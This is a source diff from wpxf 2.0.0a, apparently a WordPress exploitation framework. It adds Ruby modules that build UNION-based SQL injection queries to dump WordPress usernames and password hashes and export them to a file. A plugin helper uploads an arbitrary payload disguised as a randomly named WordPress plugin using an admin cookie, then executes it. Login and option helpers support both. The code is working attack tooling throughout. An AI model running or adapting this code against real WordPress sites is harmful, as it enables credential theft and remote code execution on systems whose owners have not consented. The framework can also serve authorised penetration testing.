wpxf 2.0.0a

data/lib/wpxf/wordpress/hash_dump.rb

@@ -0,0 +1,264 @@
+# frozen_string_literal: true
+
+# Provides reusable functionality for hash dump modules.
+module Wpxf::WordPress::HashDump
+  include Wpxf
+
+  # Initialises a new instance of {HashDump}
+  def initialize
+    super
+
+    _update_info_without_validation(
+      desc: %(
+        This module exploits an SQL injection vulnerability to generate
+        a dump of all the user hashes in the database.
+      )
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'export_path',
+        desc: 'The file to save the hash dump to',
+        required: false
+      )
+    ])
+
+    _generate_id_tokens
+  end
+
+  # @return [String] the path to export the hash dump to.
+  def export_path
+    return nil if normalized_option_value('export_path').nil?
+    File.expand_path normalized_option_value('export_path')
+  end
+
+  # @return [Boolean] returns true if only one row of the SQL query will be displayed per request.
+  def reveals_one_row_per_request
+    false
+  end
+
+  # @return [Array] an array of values to use in the generated union statement.
+  def hashdump_custom_union_values
+    []
+  end
+
+  # @return [String] a unique SQL select statement that can be used to extract the hashes.
+  def hashdump_sql_statement
+    cols = _hashdump_union_cols
+    cols[hashdump_visible_field_index] = "concat(#{_bof_token},0x3a,user_login,0x3a,user_pass,0x3a,#{_eof_token})"
+
+    query = "select #{cols.join(',')} from #{table_prefix}users"
+    return query unless reveals_one_row_per_request
+
+    "#{query} limit #{_current_row},1"
+  end
+
+  # @return [String] a unique select statement that can be used to fingerprint the database prefix.
+  def hashdump_prefix_fingerprint_statement
+    cols = _hashdump_union_cols
+    cols[hashdump_visible_field_index] = "concat(#{_bof_token},0x3a,table_name,0x3a,#{_eof_token})"
+
+    query = "select #{cols.join(',')} from information_schema.tables where table_schema = database()"
+    return query unless reveals_one_row_per_request
+
+    "#{query} limit #{_current_row},1"
+  end
+
+  # @return [Integer] the zero-based index of the column which is visible in the response output.
+  def hashdump_visible_field_index
+    0
+  end
+
+  # @return [Integer] the number of columns in the vulnerable SQL statement.
+  def hashdump_number_of_cols
+    1
+  end
+
+  # @return [Symbol] the HTTP method to use when requesting the hash dump.
+  def hashdump_request_method
+    :get
+  end
+
+  # @return [Hash] the parameters to be used when requesting the hash dump.
+  def hashdump_request_params
+    nil
+  end
+
+  # @return [Hash, String] the body to be used when requesting the hash dump.
+  def hashdump_request_body
+    nil
+  end
+
+  # @return [String] the URL of the vulnerable page.
+  def vulnerable_url
+    nil
+  end
+
+  # @return [String] the table prefix determined by the module.
+  def table_prefix
+    @table_prefix
+  end
+
+  # Run the module.
+  # @return [Boolean] true if successful.
+  def run
+    return false unless super
+
+    @_current_row = 0
+    emit_info 'Determining database prefix...'
+    return false unless _determine_prefix
+    emit_success "Found prefix: #{table_prefix}", true
+
+    @_current_row = 0
+    emit_info 'Dumping user hashes...'
+    hashes = _dump_and_parse_hashes.uniq
+    _output_hashdump_table(hashes)
+
+    _save_hashes(hashes)
+    _export_hashes(hashes) if export_path
+    true
+  end
+
+  private
+
+  def _hashdump_union_cols
+    cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
+
+    hashdump_custom_union_values.each_with_index do |value, index|
+      cols[index] = value unless value.nil?
+    end
+
+    cols
+  end
+
+  def _bof_token
+    @_bof_token
+  end
+
+  def _eof_token
+    @_eof_token
+  end
+
+  def _current_row
+    @_current_row
+  end
+
+  def _execute_hashdump_request
+    execute_request(
+      method: hashdump_request_method,
+      url: vulnerable_url,
+      params: hashdump_request_params,
+      body: hashdump_request_body,
+      cookie: session_cookie
+    )
+  end
+
+  def _dump_and_parse_hashes
+    unless reveals_one_row_per_request
+      res = _execute_hashdump_request
+      return _parse_hashdump_body(res.body)
+    end
+
+    eof = false
+    hashes = []
+
+    until eof
+      res = _execute_hashdump_request
+      break unless res.body.match?(/#{_bof_token}\:(.*?)\:#{_eof_token}/)
+
+      hash = _parse_hashdump_body(res.body)
+      hashes.push([hash[0][0], hash[0][1]]) if hash
+      @_current_row += 1
+    end
+
+    hashes
+  end
+
+  def _build_prefix_request_body
+    body = hashdump_request_body
+    unless body.nil?
+      if body.is_a?(Hash)
+        body.each do |k, v|
+          body[k] = v.gsub(hashdump_sql_statement, hashdump_prefix_fingerprint_statement)
+        end
+      else
+        body = body.gsub(hashdump_sql_statement, hashdump_prefix_fingerprint_statement)
+      end
+    end
+
+    body
+  end
+
+  def _build_prefix_request_params
+    params = hashdump_request_params
+
+    params&.each do |k, v|
+      params[k] = v.gsub(hashdump_sql_statement, hashdump_prefix_fingerprint_statement)
+    end
+
+    params
+  end
+
+  def _determine_prefix
+    body = _build_prefix_request_body
+    params = _build_prefix_request_params
+
+    res = execute_request(
+      method: hashdump_request_method,
+      url: vulnerable_url,
+      params: params,
+      body: body,
+      cookie: session_cookie
+    )
+
+    return nil unless res&.code == 200
+
+    # If the prefix is found, regardless of the row mode, return it.
+    @table_prefix = res.body[/#{_bof_token}\:([^:]+?)usermeta\:#{_eof_token}/, 1]
+    return @table_prefix if @table_prefix
+    return nil unless reveals_one_row_per_request
+
+    # If the bof and eof tokens weren't found at all, there are no more rows available.
+    return nil unless res.body.match?(/#{_bof_token}\:(.*?)\:#{_eof_token}/)
+
+    # If the tokens were found, then we can try to query another row.
+    @_current_row += 1
+    _determine_prefix
+  end
+
+  def _output_hashdump_table(hashes)
+    rows = []
+    rows.push(user: 'Username', hash: 'Hash')
+    hashes.each do |pair|
+      rows.push(user: pair[0], hash: pair[1])
+    end
+
+    emit_table rows
+  end
+
+  def _save_hashes(hashes)
+    hashes.each do |hash|
+      store_credentials(hash[0], hash[1], 'hash')
+    end
+  end
+
+  def _export_hashes(hashes)
+    File.open(export_path, 'w') do |f|
+      hashes.each do |pair|
+        f.puts "#{pair[0]}:#{pair[1]}"
+      end
+    end
+
+    emit_success "Saved dump to #{export_path}"
+  end
+
+  def _parse_hashdump_body(body)
+    pattern = /#{_bof_token}\:(.+?)\:(.+?)\:#{_eof_token}/
+    body.scan(pattern)
+  end
+
+  def _generate_id_tokens
+    @_eof_token = Utility::Text.rand_numeric(10)
+    @_bof_token = Utility::Text.rand_numeric(10)
+  end
+end

data/lib/wpxf/wordpress/login.rb

@@ -0,0 +1,60 @@
+# frozen_string_literal: true
+
+# Provides functionality required to login to WordPress.
+module Wpxf::WordPress::Login
+  # Build a request body string for a WordPress login request.
+  # @param user [String] the username.
+  # @param pass [String] the password.
+  # @return [String] the request body.
+  def wordpress_login_post_body(user, pass)
+    redirect = Wpxf::Utility::Text.rand_alpha(10)
+    builder = Wpxf::Utility::BodyBuilder.new
+    builder.add_field('log', user)
+    builder.add_field('pwd', pass)
+    builder.add_field('redirect_to', normalize_uri(target_uri, redirect))
+    builder.add_field('wp-submit', 'Login')
+    builder.create do |body|
+      return body
+    end
+  end
+
+  # @param cookies [String] the session cookies to validate in string form.
+  # @return [Boolean] true if a valid WordPress cookie was found.
+  def valid_wordpress_cookie?(cookies)
+    !(
+      cookies =~ /wordpress(?:_sec)?_logged_in_[^=]+=[^;]+;/i ||
+      # WordPress 2.0
+      cookies =~ /wordpress(?:user|pass)_[^=]+=[^;]+;/i ||
+      # WordPress 2.5
+      cookies =~ /wordpress_[a-z0-9]+=[^;]+;/i
+    ).nil?
+  end
+
+  # Log in to WordPress and return the session cookies.
+  # @param user [String] the username.
+  # @param pass [String] the password.
+  # @return [Array, nil] an array of cookies if the login is successful,
+  #   otherwise, returns nil.
+  def wordpress_login(user, pass)
+    res = _execute_wp_login_request(user, pass)
+
+    if res&.cookies
+      return res.cookies if valid_wordpress_cookie?(res.cookies.to_s)
+    end
+
+    nil
+  end
+
+  private
+
+  def _execute_wp_login_request(user, pass)
+    res = nil
+    scoped_option_change('follow_http_redirection', false) do
+      res = execute_post_request(
+        url: wordpress_url_login,
+        body: wordpress_login_post_body(user, pass)
+      )
+    end
+    res
+  end
+end

data/lib/wpxf/wordpress/options.rb

@@ -0,0 +1,27 @@
+# frozen_string_literal: true
+
+module Wpxf
+  module WordPress
+    # Provides access to various WordPress based options.
+    module Options
+      # Initialize a new instance of {Options}.
+      def initialize
+        super
+
+        register_advanced_options([WP_OPTION_CONTENT_DIR])
+      end
+
+      # @return [String] the name of the wp-content directory.
+      def wp_content_dir
+        normalized_option_value('wp_content_dir')
+      end
+
+      WP_OPTION_CONTENT_DIR = StringOption.new(
+        name: 'wp_content_dir',
+        desc: 'The name of the wp-content directory.',
+        default: 'wp-content',
+        required: true
+      )
+    end
+  end
+end

data/lib/wpxf/wordpress/plugin.rb

@@ -0,0 +1,102 @@
+# frozen_string_literal: true
+
+# Provides functionality required to interact with the plugin system.
+module Wpxf::WordPress::Plugin
+  # Retrieve a valid nonce to use for plugin uploads.
+  # @param cookie [String] a valid admin session cookie.
+  # @return [String, nil] the nonce, nil on error.
+  def fetch_plugin_upload_nonce(cookie)
+    res = execute_get_request(url: wordpress_url_plugin_upload, cookie: cookie)
+    return nil unless res&.code == 200
+    res.body[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
+  end
+
+  # Create and upload a plugin that encapsulates the current payload.
+  # @param name [String] the name of the plugin.
+  # @param payload_name [String] the name the payload should use on the server.
+  # @param cookie [String] a valid admin session cookie.
+  # @return [Boolean] true on success, false on error.
+  def upload_payload_as_plugin(name, payload_name, cookie)
+    nonce = fetch_plugin_upload_nonce(cookie)
+    return false if nonce.nil?
+
+    res = _upload_plugin(name, payload_name, cookie, nonce)
+    res&.code == 200
+  end
+
+  # Upload and execute a payload as a plugin.
+  # @param plugin_name [String] the name of the plugin.
+  # @param payload_name [String] the name the payload should use on the server.
+  # @param cookie [String] a valid admin session cookie.
+  # @return [HttpResponse, nil] the {Wpxf::Net::HttpResponse} of the request.
+  def upload_payload_as_plugin_and_execute(plugin_name, payload_name, cookie)
+    unless upload_payload_as_plugin(plugin_name, payload_name, cookie)
+      emit_error 'Failed to upload the payload'
+      return nil
+    end
+
+    payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
+    emit_info "Executing the payload at #{payload_url}..."
+    res = execute_get_request(url: payload_url)
+
+    has_body = res&.code == 200 && !res.body.strip.empty?
+    emit_success "Result: #{res.body}" if has_body
+    res
+  end
+
+  # Generate a valid WordPress plugin header / base file.
+  # @param plugin_name [String] the name of the plugin.
+  # @return [String] a PHP script with the appropriate meta data.
+  def generate_wordpress_plugin_header(plugin_name)
+    ['<?php',
+     '/**',
+     "* Plugin Name: #{plugin_name}",
+     "* Version: #{_generate_wordpress_plugin_version}",
+     "* Author: #{Wpxf::Utility::Text.rand_alpha(10)}",
+     "* Author URI: http://#{Wpxf::Utility::Text.rand_alpha(10)}.com",
+     '* License: GPL2',
+     '*/',
+     '?>'].join("\n")
+  end
+
+  private
+
+  def _generate_wordpress_plugin_version
+    "#{Wpxf::Utility::Text.rand_numeric(1)}."\
+    "#{Wpxf::Utility::Text.rand_numeric(1)}."\
+    "#{Wpxf::Utility::Text.rand_numeric(2)}"
+  end
+
+  # Build the body and return the response of the request.
+  def _upload_plugin(plugin_name, payload_name, cookie, nonce)
+    builder = _plugin_upload_builder(plugin_name, payload_name, nonce)
+    builder.create do |body|
+      return execute_post_request(
+        url: wordpress_url_admin_update,
+        params: { 'action' => 'upload-plugin' },
+        body: body,
+        cookie: cookie
+      )
+    end
+  end
+
+  # A hash containing the file paths and contents for the ZIP file.
+  def _plugin_files(plugin_name, payload_name)
+    plugin_script = generate_wordpress_plugin_header(plugin_name)
+    {
+      "#{plugin_name}/#{plugin_name}.php" => plugin_script,
+      "#{plugin_name}/#{payload_name}.php" => payload.encoded
+    }
+  end
+
+  # A {BodyBuilder} with the required fields to upload a plugin.
+  def _plugin_upload_builder(plugin_name, payload_name, nonce)
+    zip_fields = _plugin_files(plugin_name, payload_name)
+    builder = Wpxf::Utility::BodyBuilder.new
+    builder.add_field('_wpnonce', nonce)
+    builder.add_field('_wp_http_referer', wordpress_url_plugin_upload)
+    builder.add_zip_file('pluginzip', zip_fields, "#{plugin_name}.zip")
+    builder.add_field('install-plugin-submit', 'Install Now')
+    builder
+  end
+end